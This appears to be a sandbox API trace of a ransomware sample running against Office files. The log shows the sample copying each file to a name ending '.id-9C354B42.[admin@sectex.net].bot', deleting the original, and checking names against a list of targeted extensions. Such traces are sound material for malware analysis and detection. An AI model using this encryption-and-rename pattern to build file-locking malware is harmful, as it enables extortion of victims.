	[0145.829] ReadFile (in: hFile=0x38c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x9380, lpOverlapped=0x0) returned 1
	[0146.073] WriteFile (in: hFile=0x3bc, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x9390, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x9390, lpOverlapped=0x0) returned 1
	[0146.075] ReadFile (in: hFile=0x38c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.075] WriteFile (in: hFile=0x3bc, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0146.075] SetEndOfFile (hFile=0x3bc) returned 1
	[0146.075] CloseHandle (hObject=0x3bc) returned 1
	[0146.075] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.075] SetEndOfFile (hFile=0x38c) returned 1
	[0146.078] CloseHandle (hObject=0x38c) returned 1
	[0146.078] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.078] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.idx_dll")) returned 1
	[0146.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68
	[0146.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68
	[0146.079] lstrlenW (lpString=".doc") returned 4
	[0146.079] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0146.079] lstrlenW (lpString=".docx") returned 5
	[0146.079] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0146.079] lstrlenW (lpString=".pdf") returned 4
	[0146.079] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0146.079] lstrlenW (lpString=".xls") returned 4
	[0146.079] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0146.079] lstrlenW (lpString=".xlsx") returned 5
	[0146.079] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0146.079] lstrlenW (lpString=".ppt") returned 4
	[0146.079] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0146.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68
	[0146.079] lstrlenW (lpString=".zip") returned 4
	[0146.079] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0146.079] lstrlenW (lpString=".rar") returned 4
	[0146.079] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0146.079] lstrlenW (lpString=".bz2") returned 4
	[0146.079] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0146.079] lstrlenW (lpString=".7z") returned 3
	[0146.079] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0146.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68
	[0146.079] lstrlenW (lpString=".dbf") returned 4
	[0146.079] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0146.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68
	[0146.080] lstrlenW (lpString=".1cd") returned 4
	[0146.080] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0146.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68
	[0146.080] lstrlenW (lpString=".jpg") returned 4
	[0146.080] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0146.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68
	[0146.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68
	[0146.080] lstrlenW (lpString=".doc") returned 4
	[0146.080] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0146.080] lstrlenW (lpString=".docx") returned 5
	[0146.080] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0146.080] lstrlenW (lpString=".pdf") returned 4
	[0146.080] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0146.080] lstrlenW (lpString=".xls") returned 4
	[0146.080] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0146.080] lstrlenW (lpString=".xlsx") returned 5
	[0146.080] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0146.080] lstrlenW (lpString=".ppt") returned 4
	[0146.080] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0146.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68
	[0146.080] lstrlenW (lpString=".zip") returned 4
	[0146.080] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0146.080] lstrlenW (lpString=".rar") returned 4
	[0146.080] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0146.080] lstrlenW (lpString=".bz2") returned 4
	[0146.080] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0146.080] lstrlenW (lpString=".7z") returned 3
	[0146.080] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0146.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68
	[0146.080] lstrlenW (lpString=".dbf") returned 4
	[0146.080] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0146.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68
	[0146.080] lstrlenW (lpString=".1cd") returned 4
	[0146.081] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0146.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68
	[0146.081] lstrlenW (lpString=".jpg") returned 4
	[0146.081] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0146.081] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0146.081] lstrlenW (lpString="HVACDUCT.VRD") returned 12
	[0146.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.005] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1309) returned 1
	[0147.005] CloseHandle (hObject=0x384) returned 1
	[0147.005] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd")) returned 0x20
	[0147.017] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0147.017] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.017] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0147.018] GetLastError () returned 0x0
	[0147.018] ReadFile (in: hFile=0x3b0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x51d, lpOverlapped=0x0) returned 1
	[0147.069] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x520, lpOverlapped=0x0) returned 1
	[0147.069] ReadFile (in: hFile=0x3b0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.069] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.070] SetEndOfFile (hFile=0x3c4) returned 1
	[0147.070] CloseHandle (hObject=0x3c4) returned 1
	[0147.070] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.070] SetEndOfFile (hFile=0x3b0) returned 1
	[0147.072] CloseHandle (hObject=0x3b0) returned 1
	[0147.072] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.078] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacduct.vrd")) returned 1
	[0147.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60
	[0147.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60
	[0147.078] lstrlenW (lpString=".doc") returned 4
	[0147.078] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0147.078] lstrlenW (lpString=".docx") returned 5
	[0147.078] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1
	[0147.078] lstrlenW (lpString=".pdf") returned 4
	[0147.078] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0147.078] lstrlenW (lpString=".xls") returned 4
	[0147.078] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0147.078] lstrlenW (lpString=".xlsx") returned 5
	[0147.079] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1
	[0147.079] lstrlenW (lpString=".ppt") returned 4
	[0147.079] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0147.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60
	[0147.079] lstrlenW (lpString=".zip") returned 4
	[0147.079] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0147.079] lstrlenW (lpString=".rar") returned 4
	[0147.079] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0147.079] lstrlenW (lpString=".bz2") returned 4
	[0147.079] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0147.079] lstrlenW (lpString=".7z") returned 3
	[0147.079] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0147.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60
	[0147.079] lstrlenW (lpString=".dbf") returned 4
	[0147.079] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0147.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60
	[0147.079] lstrlenW (lpString=".1cd") returned 4
	[0147.079] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0147.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60
	[0147.079] lstrlenW (lpString=".jpg") returned 4
	[0147.079] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0147.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60
	[0147.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60
	[0147.079] lstrlenW (lpString=".doc") returned 4
	[0147.079] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0147.079] lstrlenW (lpString=".docx") returned 5
	[0147.079] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1
	[0147.079] lstrlenW (lpString=".pdf") returned 4
	[0147.079] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0147.079] lstrlenW (lpString=".xls") returned 4
	[0147.079] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0147.079] lstrlenW (lpString=".xlsx") returned 5
	[0147.080] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1
	[0147.080] lstrlenW (lpString=".ppt") returned 4
	[0147.080] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0147.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60
	[0147.080] lstrlenW (lpString=".zip") returned 4
	[0147.080] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0147.080] lstrlenW (lpString=".rar") returned 4
	[0147.080] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0147.080] lstrlenW (lpString=".bz2") returned 4
	[0147.080] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0147.080] lstrlenW (lpString=".7z") returned 3
	[0147.080] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0147.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60
	[0147.080] lstrlenW (lpString=".dbf") returned 4
	[0147.080] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0147.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60
	[0147.080] lstrlenW (lpString=".1cd") returned 4
	[0147.080] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0147.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDUCT.VRD") returned 60
	[0147.080] lstrlenW (lpString=".jpg") returned 4
	[0147.080] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0147.080] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0147.080] lstrlenW (lpString="INVENTRY.VRD") returned 12
	[0147.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.081] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=818) returned 1
	[0147.081] CloseHandle (hObject=0x2a0) returned 1
	[0147.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd")) returned 0x20
	[0147.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.081] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.081] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.082] GetLastError () returned 0x0
	[0147.082] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x332, lpOverlapped=0x0) returned 1
	[0147.099] WriteFile (in: hFile=0x3b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x340, lpOverlapped=0x0) returned 1
	[0147.100] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.100] WriteFile (in: hFile=0x3b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.101] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.101] CloseHandle (hObject=0x3b8) returned 1
	[0147.101] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.101] SetEndOfFile (hFile=0x2a0) returned 1
	[0147.104] CloseHandle (hObject=0x2a0) returned 1
	[0147.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.104] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd")) returned 1
	[0147.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60
	[0147.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60
	[0147.105] lstrlenW (lpString=".doc") returned 4
	[0147.105] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0147.105] lstrlenW (lpString=".docx") returned 5
	[0147.105] lstrcmpiW (lpString1=".docx", lpString2="Y.VRD") returned -1
	[0147.105] lstrlenW (lpString=".pdf") returned 4
	[0147.105] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0147.105] lstrlenW (lpString=".xls") returned 4
	[0147.105] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0147.105] lstrlenW (lpString=".xlsx") returned 5
	[0147.105] lstrcmpiW (lpString1=".xlsx", lpString2="Y.VRD") returned -1
	[0147.105] lstrlenW (lpString=".ppt") returned 4
	[0147.105] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0147.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60
	[0147.105] lstrlenW (lpString=".zip") returned 4
	[0147.105] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0147.105] lstrlenW (lpString=".rar") returned 4
	[0147.105] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0147.105] lstrlenW (lpString=".bz2") returned 4
	[0147.105] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0147.105] lstrlenW (lpString=".7z") returned 3
	[0147.105] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0147.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60
	[0147.105] lstrlenW (lpString=".dbf") returned 4
	[0147.106] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0147.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60
	[0147.106] lstrlenW (lpString=".1cd") returned 4
	[0147.106] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0147.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60
	[0147.106] lstrlenW (lpString=".jpg") returned 4
	[0147.106] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0147.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60
	[0147.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60
	[0147.106] lstrlenW (lpString=".doc") returned 4
	[0147.106] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0147.106] lstrlenW (lpString=".docx") returned 5
	[0147.106] lstrcmpiW (lpString1=".docx", lpString2="Y.VRD") returned -1
	[0147.106] lstrlenW (lpString=".pdf") returned 4
	[0147.106] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0147.106] lstrlenW (lpString=".xls") returned 4
	[0147.106] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0147.106] lstrlenW (lpString=".xlsx") returned 5
	[0147.106] lstrcmpiW (lpString1=".xlsx", lpString2="Y.VRD") returned -1
	[0147.106] lstrlenW (lpString=".ppt") returned 4
	[0147.106] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0147.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60
	[0147.106] lstrlenW (lpString=".zip") returned 4
	[0147.106] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0147.106] lstrlenW (lpString=".rar") returned 4
	[0147.106] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0147.106] lstrlenW (lpString=".bz2") returned 4
	[0147.106] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0147.106] lstrlenW (lpString=".7z") returned 3
	[0147.106] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0147.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60
	[0147.107] lstrlenW (lpString=".dbf") returned 4
	[0147.107] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0147.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60
	[0147.107] lstrlenW (lpString=".1cd") returned 4
	[0147.107] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0147.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD") returned 60
	[0147.107] lstrlenW (lpString=".jpg") returned 4
	[0147.107] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0147.107] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0147.107] lstrlenW (lpString="IPDSINTL.DLL") returned 12
	[0147.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipdsintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.109] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2270608) returned 1
	[0147.109] CloseHandle (hObject=0x2a0) returned 1
	[0147.110] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipdsintl.dll")) returned 0x20
	[0147.110] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipdsintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.110] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipdsintl.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipdsintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0147.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60
	[0147.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60
	[0147.110] lstrlenW (lpString=".doc") returned 4
	[0147.110] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.110] lstrlenW (lpString=".docx") returned 5
	[0147.110] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0147.110] lstrlenW (lpString=".pdf") returned 4
	[0147.110] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.110] lstrlenW (lpString=".xls") returned 4
	[0147.110] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.110] lstrlenW (lpString=".xlsx") returned 5
	[0147.110] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0147.110] lstrlenW (lpString=".ppt") returned 4
	[0147.110] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60
	[0147.110] lstrlenW (lpString=".zip") returned 4
	[0147.110] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.111] lstrlenW (lpString=".rar") returned 4
	[0147.111] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.111] lstrlenW (lpString=".bz2") returned 4
